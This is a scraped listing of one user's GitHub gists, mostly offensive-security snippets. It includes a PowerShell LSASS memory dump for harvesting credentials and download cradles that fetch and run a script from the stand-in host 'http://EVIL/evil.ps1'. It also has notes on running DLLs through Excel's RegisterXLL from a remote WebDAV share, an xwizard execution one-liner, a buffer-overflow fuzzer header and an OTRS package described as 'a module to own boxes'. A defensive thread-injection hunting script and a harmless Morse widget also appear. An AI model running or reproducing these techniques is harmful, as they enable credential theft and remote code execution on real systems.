I hereby claim:
- I am natesubra on github.
- I am nathansubra (https://keybase.io/nathansubra) on keybase.
- I have a public key whose fingerprint is 99E0 F11A 7152 1FDB 8861 F0C4 0539 12C8 6C51 CD79
To claim this, I am signing this object:
Nate Subra natesubra
natesubra
/ keybase.md
Created
May 26, 2016 14:37
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $LSASSProc = Get-Process lsass | |
| $FileStream = New-Object IO.FileStream('c:\lsass.dmp', [IO.FileMode]::Create) | |
| $Result = ((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods', 'NonPublic')).GetMethod('MiniDumpWriteDump', ([Reflection.BindingFlags] 'NonPublic, Static'))).Invoke($null,@($proc.Handle,$proc.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero)) | |
| $FileStream.Close() |
natesubra
/ bashfuzz.sh
Last active
December 28, 2016 20:22
Quick and dirty buffer overflow script using bash, tr, and printf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # 1st arg is ip, 2nd is port, 3rd is buffer size | |
| # ex: ./bashfuzz.sh 10.0.0.1 110 2700 | |
| [[ -z "$1" ]] && { echo "Parameter 1 is empty (dest ip)" ; exit 1; } | |
| [[ -z "$2" ]] && { echo "Parameter 2 is empty (dest port)" ; exit 1; } | |
| [[ -z "$3" ]] && { echo "Parameter 3 is empty (buffer size)" ; exit 1; } | |
| # different buffer options |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <otrs_package version="1.0"> | |
| <Name>OTRS Command Runner</Name> | |
| <Version>1.0</Version> | |
| <Framework>5.0.x</Framework> | |
| <Vendor>scrubs</Vendor> | |
| <Description Lang="en">A module to own boxes with OTRS more quickly.</Description> | |
| <License>MIT License</License> | |
| <CodeInstall><![CDATA[ |
24x7x365 SUPPORT http://www.captiongenerator.com/320492/Offsec-Student-Admins
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <p><input type="text" id="morse" placeholder="Type something and push play." /> | |
| <button id="play">Play</button></p> | |
| <script type="text/javascript"> | |
| function MorseNode(ac, rate) { | |
| // ac is an audio context. | |
| this._oscillator = ac.createOscillator(); | |
| this._gain = ac.createGain(); | |
| this._gain.gain.value = 0; |
natesubra
/ Get-InjectedThread.ps1
Created
July 20, 2017 02:34
— forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
natesubra
/ ExcelXLL.md
Created
July 24, 2017 03:31
— forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
natesubra
/ instructions.txt
Created
August 8, 2017 20:19
— forked from NickTyrer/instructions.txt
xwizard_sct
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} |
natesubra
/ DownloadCradles.ps1
Created
November 17, 2017 22:46
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
OlderNewer